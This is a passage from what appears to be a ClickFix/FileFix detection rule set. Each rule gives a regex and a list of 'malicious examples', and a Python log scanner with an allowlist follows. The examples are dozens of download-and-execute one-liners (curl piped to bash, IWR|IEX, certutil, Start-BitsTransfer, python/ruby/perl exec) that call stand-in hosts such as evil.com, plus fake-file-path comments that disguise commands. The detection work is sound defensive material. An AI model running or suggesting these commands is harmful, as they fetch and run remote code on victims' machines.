powershell IWR http://evil.com/backdoor.exe -OutFile backdoor.exe && .\backdoor.exe
curl http://evil.com/payload.sh | bash
certutil -urlcache -f http://attacker.com/mal.exe mal.exe; mal.exe
wget http://evil.com/reverse.sh -O /tmp/r.sh && chmod +x /tmp/r.sh && /tmp/r.sh
curl -o C:\Temp\evil.exe http://malware.com/evil.exe && C:\Temp\evil.exe
[18] Start Bitstransfer
Detects Start-BitsTransfer downloading files from URLs. PowerShell cmdlet abused for malware downloads.
(?i)(start-bitstransfer.*(https?|ftp)://)
Malicious examples:
Start-BitsTransfer -Source http://evil.com/malware.exe -Destination C:\malware.exe
Start-BitsTransfer -Source "https://attacker.com/payload.dll" -Destination payload.dll
powershell -c "Start-BitsTransfer -Source http://malware.com/backdoor.exe -Destination backdoor.exe"
Start-BitsTransfer -Source ftp://evil.com/trojan.exe -Destination C:\Temp\trojan.exe
Start-BitsTransfer http://bad.com/dropper.dll C:\dropper.dll
Start-BitsTransfer -Source https://192.168.1.100/clickfix.exe -Destination C:\Windows\Temp\clickfix.exe
Start-BitsTransfer -Source 'http://evil.com/ransomware.exe' -Destination 'C:\Users\Public\ransomware.exe'
powershell Start-BitsTransfer -Source http://malware.com/implant.ps1 -Destination implant.ps1
Start-BitsTransfer -Source https://attacker.com/stage2.dll -Destination C:\Temp\stage2.dll -Priority Foreground
Start-BitsTransfer -Source ftp://evil.com/backdoor.exe -Destination backdoor.exe
powershell -nop -ep bypass -c "Start-BitsTransfer -Source http://evil.com/loader.exe -Destination loader.exe"
Start-BitsTransfer -Source http://malware.com/reverse-shell.ps1 -Destination C:\ProgramData\rs.ps1
Start-BitsTransfer -Source https://evil.com/trojan.dll -Destination C:\Windows\Temp\trojan.dll
Start-BitsTransfer http://attacker.com/clickfix-installer.msi C:\Temp\installer.msi
powershell.exe -Command "Start-BitsTransfer -Source 'https://evil.com/malware.exe' -Destination 'malware.exe'"
Start-BitsTransfer -Source http://evil.com/dropper.vbs -Destination C:\Users\victim\AppData\Local\Temp\dropper.vbs
Start-BitsTransfer -Source ftp://192.168.1.50/payload.bin -Destination payload.bin
Start-BitsTransfer -Source https://malware.com/obfuscated.ps1 -Destination obfuscated.ps1 -Description 'Update'
Start-BitsTransfer -Source http://evil.com/persistence.exe -Destination C:\ProgramData\persistence.exe
powershell Start-BitsTransfer -Source 'http://attacker.com/exploit.dll' -Destination 'exploit.dll'
[19] Filefix Powershell Comment Path
Detects the FileFix technique, where a PowerShell command is followed by a comment containing a fake file path. The comment makes the clipboard content appear to be a legitimate file path in File Explorer's address bar.
(?i)(powershell.*#\s*[A-Za-z]:\\.+\.(docx?|xlsx?|pptx?|pdf|zip|exe))
Malicious examples:
Powershell.exe -c ping attacker.example # C:\company\internal\shared\file.docx
powershell -c IWR http://evil.com/p.ps1|IEX # C:\Users\John\Documents\Report.pdf
powershell.exe -ep bypass -c curl http://malware.com/payload.exe -o $env:temp\p.exe # C:\HR\Policy2024.docx
PowerShell -Command "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/s')" # C:\Finance\Q4Report.xlsx
powershell -nop -w hidden -c IEX(IWR evil.com/script) # C:\SharedDrive\Documents\Presentation.pptx
powershell.exe -c Start-BitsTransfer http://attacker.com/mal.exe $env:temp\m.exe # C:\Data\Archive.zip
powershell -enc SQBFAFgA... # C:\Program Files\Company\setup.exe
cmd /c powershell -c wget http://evil.com/payload.ps1 -O %temp%\x.ps1; .\x.ps1 # C:\Admin\Tools\utility.exe
powershell -Command "certutil -urlcache -f http://malware.com/file.exe %temp%\out.exe" # C:\IT\Software\installer.exe
powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://evil.com/r','%temp%\r.exe') # C:\Backup\2024\data.zip
[20] Filefix Exe Path Comment
Detects the FileFix variant where an executable path is followed by a run of spaces and a comment. The executable runs when entered in File Explorer's address bar while the comment is ignored.
(?i)(^([A-Za-z]:|%[A-Za-z_]+%)\\.*\.exe\s{3,}#)
Malicious examples:
%USERPROFILE%\Downloads\payload.exe # This will still execute
C:\Users\Public\malware.exe # Legitimate installer
%TEMP%\setup.exe # Company software
C:\ProgramData\update.exe # System update
%APPDATA%\Roaming\Chrome\chrome_update.exe # Browser update
C:\Windows\Temp\installer.exe # Required installation
%PUBLIC%\Downloads\document_reader.exe # PDF viewer
C:\Users\victim\AppData\Local\Temp\legitimate.exe # Safe file
%LOCALAPPDATA%\Microsoft\Edge\edge_installer.exe # Edge update
C:\Temp\critical_patch.exe # Security patch
%USERPROFILE%\Desktop\important.exe # Important tool
C:\Data\tools\utility.exe # Admin utility
[21] Download Commands
Detects general download commands (curl, wget, IWR) from remote URLs. Requires allowlisting for legitimate use.
(?i)((curl|wget|invoke-webrequest|iwr).*(https?|ftp)://)
Malicious examples:
curl http://evil.com/malware.exe -o malware.exe
wget https://attacker.com/payload.sh
Invoke-WebRequest http://malware.com/backdoor.dll -OutFile backdoor.dll
IWR https://evil.com/dropper.ps1 | IEX
curl -fsSL http://bad.com/script.sh | bash
wget -qO- http://evil.com/exploit.sh | sh
curl http://192.168.1.100/clickfix.exe -o clickfix.exe
Invoke-WebRequest -Uri http://evil.com/ransomware.exe -OutFile C:\Temp\ransomware.exe
wget ftp://attacker.com/trojan.bin -O /tmp/trojan.bin
IWR http://malware.com/implant.dll -Method Get -OutFile implant.dll
curl -s http://evil.com/reverse-shell.sh -o /tmp/rs.sh
wget --no-check-certificate https://evil.com/malware.exe
Invoke-WebRequest https://attacker.com/stage2.ps1 -UseBasicParsing -OutFile stage2.ps1
curl http://evil.com/backdoor.py -o backdoor.py
wget -q http://malware.com/loader.dll
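The allowlisting that rule [21] calls for, and the line anchoring that rules [11] and [20] depend on, are easiest to see with the patterns running over sample lines. The following Python is an added example rather than anything from the page's rule set: it compiles the page's [11], [17] and [21] patterns verbatim, scans a constructed log line by line, and suppresses [21] when every URL host on the line is in an assumed allowlist (ALLOWED_HOSTS, a made-up set; URL_HOST, scan_line and scan_log are helpers written here). It also shows that [11], because it anchors curl/wget to the start of the line, does not fire on a prefixed command such as `sudo curl ... | bash`, which [17] still catches.

```python
import re

# Three of the page's patterns, copied verbatim and keyed by the page's rule numbers.
RULES = {
    "[11] Bash Pipe Shell": r"(?i)(^(?![\s]*#)(curl|wget).*(https?|ftp)://.*\|.*(bash|sh|zsh))",
    "[17] Command Chain": r"(?i)((certutil|bitsadmin|curl|wget|powershell|iwr).*(https?|ftp)://.*(\&\&|\|\||;|\|).*(cmd|powershell|bash|sh|rundll32|regsvr32|mshta|wscript|cscript|\.exe|\.bat|\.vbs))",
    "[21] Download Commands": r"(?i)((curl|wget|invoke-webrequest|iwr).*(https?|ftp)://)",
}
COMPILED = {name: re.compile(pattern) for name, pattern in RULES.items()}

# Assumed allowlist (constructed): hosts this environment legitimately downloads from.
ALLOWED_HOSTS = {"packages.example.org", "mirror.example.org"}

# Assumed helper pattern: the host part of every http(s)/ftp URL on a line.
URL_HOST = re.compile(r"(?i)(?:https?|ftp)://([^/\s:'\"]+)")


def url_hosts(line):
    """Lower-cased set of URL hosts found on the line."""
    return {host.lower() for host in URL_HOST.findall(line)}


def scan_line(line, allowed_hosts=ALLOWED_HOSTS):
    """Return the names of the rules that fire on one command line.

    Rule [21] is the noisy one the page says needs allowlisting, so it is
    suppressed when every URL host on the line is allowlisted. The other two
    rules are left alone: a download piped into a shell is worth seeing
    regardless of which host served it."""
    hits = []
    for name, rx in COMPILED.items():
        if rx.search(line) is None:
            continue
        if name.startswith("[21]"):
            hosts = url_hosts(line)
            if hosts and hosts <= allowed_hosts:
                continue
        hits.append(name)
    return hits


def scan_log(text, allowed_hosts=ALLOWED_HOSTS):
    """Scan a multi-line log one line at a time.

    Rules [11] and [20] begin with '^', so they must see each command on its
    own line; run against a whole buffer, '^' would match only at its start."""
    return {line: scan_line(line, allowed_hosts)
            for line in text.splitlines() if line.strip()}


# Constructed sample log: the page's first [11] example plus three constructed lines
# (a prefixed command, an allowlisted download, and a commented-out command).
SAMPLE_LOG = """\
curl http://evil.com/malware.sh | bash
sudo curl http://evil.com/malware.sh | bash
curl https://packages.example.org/tool.tar.gz -o tool.tar.gz
# curl http://evil.com/x.sh | bash
"""

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG).items():
        print(f"{line:<62} -> {hits or 'no alert'}")
```

Note that only [11] carries the leading-comment exclusion: the commented-out line still trips [17] and [21], so a commented line in a script file will alert under those rules unless the caller strips comments first.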
[22] Python Ruby Perl
Detects scripting languages downloading and executing remote scripts. Uncommon in ClickFix attacks (5-10% prevalence). High legitimate usage in development environments requires context to distinguish malicious use.
(?i)((python|ruby|perl).*(urllib|requests|eval|exec|net::http|lwp).*https?://|(curl|wget).*https?://.*\|.*(python|ruby|perl))
Malicious examples:
python -c "import urllib; exec(urllib.urlopen('http://evil.com/p.py').read())"
ruby -e "require 'net/http'; eval(Net::HTTP.get(URI('http://malware.com/s.rb')))"
perl -e "use LWP::Simple; eval(get('http://evil.com/p.pl'))"
python3 -c "import requests; exec(requests.get('https://attacker.com/backdoor.py').text)"
python -c "exec(__import__('urllib').urlopen('http://evil.com/mal.py').read())"
ruby -e "require 'open-uri'; eval(URI.open('http://bad.com/dropper.rb').read)"
perl -MLWP::Simple -e "eval(get('http://evil.com/payload.pl'))"
python3 -c "import urllib.request; exec(urllib.request.urlopen('http://malware.com/clickfix.py').read())"
ruby -ropen-uri -e "eval(URI.open('https://attacker.com/implant.rb').read)"
curl http://evil.com/script.py | python
wget -qO- http://malware.com/payload.rb | ruby
curl -s https://evil.com/backdoor.pl | perl
python2 -c "import urllib2; exec(urllib2.urlopen('http://evil.com/mal.py').read())"
python -c "exec(__import__('requests').get('https://attacker.com/stage2.py').text)"
curl http://evil.com/dropper.py | python3